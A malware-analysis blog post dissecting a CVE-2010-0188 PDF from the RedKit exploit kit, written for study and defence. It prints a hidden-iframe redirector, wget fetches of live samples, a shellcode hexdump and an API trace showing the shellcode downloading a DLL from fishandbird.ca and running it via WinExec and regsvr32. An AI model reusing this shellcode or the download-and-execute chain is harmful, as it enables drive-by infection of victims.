Analysis of CVE-2010-0188 PDF from RedKit ExploitKit

After noticing a substantial increase in RedKit infections, following a series of investigations performed on URLQuery, we have decided to go deeper to understand what was happening behind the curtains. RedKit is an exploitation packs that uses the following infection flow:

RedKit-Flow

RedKit-Flow

We have this for today’s example: http://urlquery.net/report.php?id=1305873 and the resource is http://senreibehn.narod.ru/

A user visiting a page compromised with RedKit redirector will find, as usual, a frame like this:

<iframe name=Twitter scrolling=auto frameborder=no align=center height=2
width=2 src=http://mymesotheliomatreatments.com/eric.html?j=1937657>
</iframe>

the resulting landing page will be like this:

2013-09-19-230522_1122x619_scrot

 

We are interested to the version and date of this plugin:

version: “0.7.7”, rDate: “04/11/2012”, name: “PluginDetect”

and:

<applet archive="hxxp://fishandbird.ca/332.jar" code="Vlast.class">
<applet archive="hxxp://fishandbird.ca/887.jar" code="Vlast.class">
otrtorol.setAttribute (biiz, "hxxp://fishandbird.ca/987.pdf");

In this post we will concentrate on the analysis of the malicious PDF:

https://www.virustotal.com/en/file/2f7d25ce46c31401ce973358b2cc3b8bd7746e9af394d49f883faf60919318f2/analysis/1362737258/

Detection ratio: 4 / 46

We have the link to the document, but we need a proper http header in order to download it, otherwise our downloading attempt will be detected and a 404 error returned. Let’s fire up our wget with the following parameters:

$ wget --referer="hxxp://senreibehn.narod.ru/" --user-agent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" -dnv  hxxp://fishandbird.ca/987.pdf                                                                 Setting --no (verbose) to 0
DEBUG output created by Wget 1.14 on linux-gnu.

URI encoding = "UTF-8"
Caching fishandbird.ca => 66.96.160.145
Created socket 3.
Releasing 0x00000000017bfa30 (new refcount 1).

---request begin---
GET /987.pdf HTTP/1.1
Referer: hxxp://senreibehn.narod.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
Accept: */*
Host: fishandbird.ca
Connection: Keep-Alive

---request end---

---response begin---
HTTP/1.1 200 OK
Date: Thu, 07 Mar 2013 17:45:20 GMT
Content-Type: application/pdf
Content-Length: 6270
Connection: keep-alive
Server: Nginx / Varnish
X-Powered-By: PHP/5.2.17
Content-Disposition: inline; filename=37a1e796.pdf

---response end---
Registered socket 3 for persistent reuse.
2013-03-07 18:43:20 URL:hxxp://fishandbird.ca/987.pdf [6270/6270] -> "987.pdf" [1]

Ok, we have our PDF now and we are ready to begin our analysis. We need a tool for inspection, in our case we’ll use Didier Steven’s pdf-parser.py

First of all: let’s begin with a statistical analysis:

$ python2 pdf-parser.py --stats  ../../tmp/effective/987.pdf 
Comment: 3
XREF: 1
Trailer: 1
StartXref: 1
Indirect object: 19
  7: 4, 41, 56, 11, 19, 17, 8
 /Annot 1: 16
 /Catalog 1: 7
 /EmbeddedFile 7: 9, 18, 15, 13, 5, 6, 2
 /Font 1: 10
 /Page 1: 1
 /Pages 1: 12

We have a few interesting things here, the PDF format seems to be wrong and we have /EmbeddedFile in it (notice that there is no javascript inside)

Second: a deeper analysis, to know which objects can be found inside the document:

$ python2 pdf-parser.py --filter --raw  ../../tmp/effective/987.pdf                   
PDF Comment %PDF-1.6

PDF Comment %����

obj 4 0
 Type: 
 Referencing: 
 Contains stream

  <<
    /Filter /FlateDecode
    /Length 166
  >>

TL;DR : of course we have a few good clues, but what’s interesting to us is the obj 2.

Third: investigate object 2:

$ python2 pdf-parser.py --filter --raw  ../../tmp/effective/987.pdf --object 2

2013-09-19-231341_1122x619_scrot

Oh Oh what do we have here?
It’s a javascript, let’s make it more appealing to the eyes:

2013-09-19-231649_1122x619_scrot

Fourth: analysis of the javascript:
Now we have to resolve the variables, for this pourpose we will use nodejs:

2013-09-19-232012_1141x376_scrot

let’s unescape it:

2013-09-19-232217_1112x560_scrot

and now let’s make it more readable:

2013-09-19-232430_1366x748_scrot

Fast analysis with VirusTotal:

https://www.virustotal.com/en/file/17ada6ea6f704fa814d66658e0d656ac6ca78956924249530b5e3e03bc1ce07c/analysis/1362737102/
Microsoft     Exploit:Win32/CVE-2010-0188

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0188

Right now we are not interested in the exploit itself, but we want to understand what is the dropped payload.

var sc_str = hex2str (sc_hex);
var scode = str2uni (sc_str);
heap_spray3 (scode);

We can use python to decode sc_hex (both the sc_hex do the same thing):

2013-09-19-232641_856x456_scrot

Let’s save it and scan with VT:
https://www.virustotal.com/en/file/ac41dbad169ffcb798262054cebe7f77920b373488da96c89a8fe68cc7b93f90/analysis/1362737700/

Microsoft Exploit:Win32/Shellcode.AA

Just FYI this is the scan of the second sc_hex:
https://www.virustotal.com/en/file/d31955efac35e61969ae534576ed4e3c84c0b9a68abc200db290db448d2cb3bc/analysis/1362737908/

Microsoft Exploit:Win32/Shellcode.AA

here it is the hexdump:

00000000  4c 20 60 0f 05 17 80 4a  3c 20 60 0f 0f 63 80 4a  |L `....J< `..c.J|
00000010  a3 eb 80 4a 30 20 82 4a  6e 2f 80 4a 41 41 41 41  |...J0 .Jn/.JAAAA|
00000020  26 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |&...............|
00000030  12 39 80 4a 64 20 60 0f  00 04 00 00 41 41 41 41  |.9.Jd `.....AAAA|
00000040  41 41 41 41 66 83 e4 fc  fc 85 e4 75 34 e9 5f 33  |AAAAf......u4._3|
00000050  c0 64 8b 40 30 8b 40 0c  8b 70 1c 56 8b 76 08 33  |.d.@0.@..p.V.v.3|
00000060  db 66 8b 5e 3c 03 74 33  2c 81 ee 15 10 ff ff b8  |.f.^<.t3,.......|
00000070  8b 40 30 c3 46 39 06 75  fb 87 34 24 85 e4 75 51  |.@0.F9.u..4$..uQ|
00000080  e9 eb 4c 51 56 8b 75 3c  8b 74 35 78 03 f5 56 8b  |..LQV.u<.t5x..V.|
00000090  76 20 03 f5 33 c9 49 41  fc ad 03 c5 33 db 0f be  |v ..3.IA....3...|
000000a0  10 38 f2 74 08 c1 cb 0d  03 da 40 eb f1 3b 1f 75  |.8.t......@..;.u|
000000b0  e6 5e 8b 5e 24 03 dd 66  8b 0c 4b 8d 46 ec ff 54  |.^.^$..f..K.F..T|
000000c0  24 0c 8b d8 03 dd 8b 04  8b 03 c5 ab 5e 59 c3 eb  |$...........^Y..|
000000d0  53 ad 8b 68 20 80 7d 0c  33 74 03 96 eb f3 8b 68  |S..h .}.3t.....h|
000000e0  08 8b f7 6a 05 59 e8 98  ff ff ff e2 f9 e8 00 00  |...j.Y..........|
000000f0  00 00 58 50 6a 40 68 ff  00 00 00 50 83 c0 19 50  |..[email protected]...P...P|
00000100  55 8b ec 8b 5e 10 83 c3  05 ff e3 68 6f 6e 00 00  |U...^......hon..|
00000110  68 75 72 6c 6d 54 ff 16  83 c4 08 8b e8 e8 61 ff  |hurlmT........a.|
00000120  ff ff eb 02 eb 72 81 ec  04 01 00 00 8d 5c 24 0c  |.....r.......\$.|
00000130  c7 04 24 72 65 67 73 c7  44 24 04 76 72 33 32 c7  |..$regs.D$.vr32.|
00000140  44 24 08 20 2d 73 20 53  68 f8 00 00 00 ff 56 0c  |D$. -s Sh.....V.|
00000150  8b e8 33 c9 51 c7 44 1d  00 77 70 62 74 c7 44 1d  |..3.Q.D..wpbt.D.|
00000160  05 2e 64 6c 6c c6 44 1d  09 00 59 8a c1 04 30 88  |..dll.D...Y...0.|
00000170  44 1d 04 41 51 6a 00 6a  00 53 57 6a 00 ff 56 14  |D..AQj.j.SWj..V.|
00000180  85 c0 75 16 6a 00 53 ff  56 04 6a 00 83 eb 0c 53  |..u.j.S.V.j....S|
00000190  ff 56 04 83 c3 0c eb 02  eb 13 47 80 3f 00 75 fa  |.V........G.?.u.|
000001a0  47 80 3f 00 75 c4 6a 00  6a fe ff 56 08 e8 9c fe  |G.?.u.j.j..V....|
000001b0  ff ff 8e 4e 0e ec 98 fe  8a 0e 89 6f 01 bd 33 ca  |...N.......o..3.|
000001c0  8a 5b 1b c6 46 79 36 1a  2f 70 68 74 74 70 3a 2f  |.[..Fy6./phttp:/|
000001d0  2f 66 69 73 68 61 6e 64  62 69 72 64 2e 63 61 2f  |/fishandbird.ca/|
000001e0  36 32 2e 68 74 6d 6c 00  00                       |62.html..|

After the shellcode analysis performed with wepawet, we have this:

Shellcode Analysis
Shellcode API Trace
Offset	DLL.API Name and arguments	Return value
0x7c801ad9	kernel32.VirtualProtect(lpAddress=0x4020f8, dwSize=255)	1
0x7c801d7b	kernel32.LoadLibraryA(lpFileName=urlmon)	0x1a400000
0x7c835dfa	kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])	
0x1a494bbe	urlmon.URLDownloadToFileA(pCaller=0, szURL=hxxp://fishandbird.ca/62.html, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)	0
0x7c86250d	kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)	
0x7c86250d	kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)	
0x7c81cb3b	kernel32.TerminateThread(dwExitCode=0)

That in order does:

  1. LoadLibrary of urlmon.dll
  2. Downloads the payload from hxxp://fishandbird.ca/62.html
  3. Writes the data to wpbto.dll
  4. Executes the binary via WinExec()
  5. Registers the dll by running: regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll

let’s fire up our wget and download the final stage from hxxp://fishandbird.ca/62.html:

$ wget --referer="hxxp://senreibehn.narod.ru/" --user-agent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" -dnv  hxxp://fishandbird.ca/62.html
Setting --no (verbose) to 0
DEBUG output created by Wget 1.14 on linux-gnu.

URI encoding = "UTF-8"
Caching fishandbird.ca => 66.96.160.145
Created socket 3.
Releasing 0x0000000000dafa40 (new refcount 1).

---request begin---
GET /62.html HTTP/1.1
Referer: hxxp://senreibehn.narod.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
Accept: */*
Host: fishandbird.ca
Connection: Keep-Alive

---request end---

---response begin---
HTTP/1.1 200 OK
Date: Thu, 07 Mar 2013 17:45:49 GMT
Content-Type: application/octet-stream
Content-Length: 26977
Connection: keep-alive
Server: Nginx / Varnish
X-Powered-By: PHP/5.2.17
Expires: Mon, 20 Aug 2002 02:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
Content-Transfer-Encoding: binary
Content-Disposition: inline; filename=setup.exe

---response end---
Registered socket 3 for persistent reuse.
2013-03-07 18:43:50 URL:hxxp://fishandbird.ca/62.html [26977/26977] -> "62.html" [1]

Of course we are dealing with another binary:

https://www.virustotal.com/en/file/d34414b40ba1573722c96a02d37fdf553e2b2427b7757228e24885cde96cda80/analysis/1362738404/
Detection ratio: 20 / 46
Microsoft TrojanDownloader:Win32/Karagany.I

Size: 26977
MD5: 4e0d8266609ef72a285a2fcb5871d2de
SHA1: 1d114f920252fec07ace3b929171ec1614f888e5
SHA256: d34414b40ba1573722c96a02d37fdf553e2b2427b7757228e24885cde96cda80
ssdeep: 768:jdjPEgPcTA9Qcw0fwvPi867rg8LDuRvGCOZsF:1PzPcTrcnfGPg7r5LDIvGC7F
First Seen: 2013-03-07 18:11:06.828570
Last Seen: 2013-03-07 18:11:06.828594
Tags: []
References: []
File Type: Win32 EXE

ExifTool: 
['File Access Date/Time           : 2013:03:07 18:56:15+01:00',
 'File Inode Change Date/Time     : 2013:03:07 18:55:14+01:00',
 'File Permissions                : rw-r--r--',
 'MIME Type                       : application/octet-stream',
 'Machine Type                    : Intel 386 or later, and compatibles',
 'Time Stamp                      : 2013:03:07 13:47:57+01:00',
 'PE Type                         : PE32',
 'Linker Version                  : 1.1',
 'Code Size                       : 13824',
 'Initialized Data Size           : 2560',
 'Uninitialized Data Size         : 0',
 'Entry Point                     : 0x1000',
 'OS Version                      : 4.0',
 'Image Version                   : 0.0',
 'Subsystem Version               : 4.0',
 'Subsystem                       : Windows GUI']

TrID: 
[' 38.4% (.DLL) Win32 Dynamic Link Library (generic) (6581/28/2)',
 ' 38.0% (.EXE) Win32 Executable (generic) (6514/8/2)',
 ' 11.7% (.EXE) Generic Win/DOS Executable (2002/3)',
 ' 11.6% (.EXE) DOS Executable Generic (2000/1)',
 '  0.0% (.CEL) Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3)']

PeID: 
[['PureBasic 4.x -> Neil Hodgson']]

Antivirus Signatures: 
[]

PE INFO: 
Time Stamp:     2013-03-07 12:47:57
Portable Executable Signature: PE32 on i386 architecture

Section:

Name:                   .code
Virtual Address:        0x1000
Virtual Size:           6924
Size of Raw Offset:     7168
SHA1:                   6a51b7ee8fb5961cf323c7123fe45d272cdbe8e5
Entropy:                5.61391718668 

Name:                   .text
Virtual Address:        0x3000
Virtual Size:           6557
Size of Raw Offset:     6656
SHA1:                   c7504a2970b2a2998b27660093c004b681644e66
Entropy:                6.23719207884 

Name:                   .rdata
Virtual Address:        0x5000
Virtual Size:           16
Size of Raw Offset:     512
SHA1:                   7d2f468b2932c6797fe38c06a969e27a2c3f9b47
Entropy:                0.231158144857 

Name:                   .data
Virtual Address:        0x6000
Virtual Size:           1904
Size of Raw Offset:     1536
SHA1:                   e2e16b7dc9dd6a5aff25b792f751828a50c10739
Entropy:                4.40287462284 

Imports:

MSVCRT.dll
        memset                          0x406280
        strcmp                          0x406284
        memmove                         0x406288
        memcpy                          0x40628c
        strlen                          0x406290

KERNEL32.dll
        GetModuleHandleA                0x406298
        HeapCreate                      0x40629c
        HeapDestroy                     0x4062a0
        ExitProcess                     0x4062a4
        CloseHandle                     0x4062a8
        SetCommTimeouts                 0x4062ac
        InitializeCriticalSection       0x4062b0
        GetModuleFileNameA              0x4062b4
        GetExitCodeProcess              0x4062b8
        WideCharToMultiByte             0x4062bc
        HeapAlloc                       0x4062c0
        SetCurrentDirectoryA            0x4062c4
        WriteFile                       0x4062c8
        HeapFree                        0x4062cc
        ReadFile                        0x4062d0
        HeapReAlloc                     0x4062d4

USER32.DLL
        CallWindowProcA                 0x4062dc

 

Stay tuned, in the next blogpost we’ll further investigate the dropped malware. For you to study here it is a package complete with all files, as usual the password is set to: infected

redkit-pdf

$ md5sum 987.pdf 62.html payload.bin payload2.bin javascript1.js
8c964618db35a6e34ee57418c001e1cc  987.pdf
4e0d8266609ef72a285a2fcb5871d2de  62.html
8ff277a29a83bfb77edefbd2b3fd2681  payload.bin
8fe6634b059c7747fd4eeaed1e840121  payload2.bin
c4d9037b666144569a5ccabe06d46763  javascript1.js